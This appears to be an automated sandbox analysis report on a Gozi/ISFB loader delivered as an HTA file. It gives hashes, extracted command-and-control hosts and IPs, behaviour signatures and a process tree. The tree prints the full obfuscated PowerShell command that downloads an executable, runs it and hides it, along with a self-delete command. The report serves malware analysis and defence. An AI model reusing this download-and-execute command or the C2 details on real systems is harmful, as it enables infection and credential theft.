Analysis
max time kernel: 147s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-08-2022 01:33
Static task: static1
Behavioral task: behavioral1
Sample: 55.hta
Resource: win7-20220715-en
General
Target: 55.hta
Size: 12KB
MD5: 26ace4f34d7b5df03722125fe5280d4c
SHA1: 7b9e7c2c60e66ec42061752d707ab70c3c84187a
SHA256: e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
SHA512: 5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115
Malware Config
Extracted
gozi_ifsb
11111
trackingg-protectioon.cdn1.mozilla.net
194.76.225.168
194.76.224.242
base_path: /fonts/
build: 250240
exe_type: loader
extension: .bak
server_id: 50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
25 | 876 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
pid | process
4600 | bartor.exe
2668 | WinZip.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | bartor.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid | process
876 | powershell.exe
876 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 876 | powershell.exe
Token: SeDebugPrivilege | 4600 | bartor.exe
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
description | pid | process | target process
PID 4364 wrote to memory of 876 | 4364 | mshta.exe | powershell.exe
PID 4364 wrote to memory of 876 | 4364 | mshta.exe | powershell.exe
PID 4364 wrote to memory of 876 | 4364 | mshta.exe | powershell.exe
PID 876 wrote to memory of 4600 | 876 | powershell.exe | bartor.exe
PID 876 wrote to memory of 4600 | 876 | powershell.exe | bartor.exe
PID 876 wrote to memory of 4600 | 876 | powershell.exe | bartor.exe
PID 4600 wrote to memory of 4200 | 4600 | bartor.exe | cmd.exe
PID 4600 wrote to memory of 4200 | 4600 | bartor.exe | cmd.exe
PID 4600 wrote to memory of 4200 | 4600 | bartor.exe | cmd.exe
PID 4200 wrote to memory of 2668 | 4200 | cmd.exe | WinZip.exe
PID 4200 wrote to memory of 2668 | 4200 | cmd.exe | WinZip.exe
PID 4200 wrote to memory of 2668 | 4200 | cmd.exe | WinZip.exe
PID 4600 wrote to memory of 3448 | 4600 | bartor.exe | cmd.exe
PID 4600 wrote to memory of 3448 | 4600 | bartor.exe | cmd.exe
PID 4600 wrote to memory of 3448 | 4600 | bartor.exe | cmd.exe
PID 3448 wrote to memory of 2200 | 3448 | cmd.exe | choice.exe
PID 3448 wrote to memory of 2200 | 3448 | cmd.exe | choice.exe
PID 3448 wrote to memory of 2200 | 3448 | cmd.exe | choice.exe
Processes
-
C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Depth: 1
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 4364
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
Depth: 2
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 876
-
C:\Users\Admin\AppData\Roaming\bartor.exe
Command line: "C:\Users\Admin\AppData\Roaming\bartor.exe"
Depth: 3
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4600
-
C:\Windows\SysWOW64\cmd.exe
Command line: "cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
Depth: 4
- Suspicious use of WriteProcessMemory
PID: 4200
-
C:\Users\Admin\Downloads\WinZip.exe
Command line: C:\Users\Admin\Downloads\WinZip.exe
Depth: 5
- Executes dropped EXE
PID: 2668
-
C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
Depth: 4
- Suspicious use of WriteProcessMemory
PID: 3448
-
C:\Windows\SysWOW64\choice.exe
Command line: choice /C Y /N /D Y /T 7
Depth: 5
PID: 2200
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize: 494KB
MD5: 0f2be4fe0362766dcf339d4c03326bc4
SHA1: 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256: 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512: 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150
-
Filesize: 338KB
MD5: 468042278a3e4841d3e33ccca10d99ca
SHA1: 22532f37096a200d448420359c01bbebaaf6b820
SHA256: b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512: 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf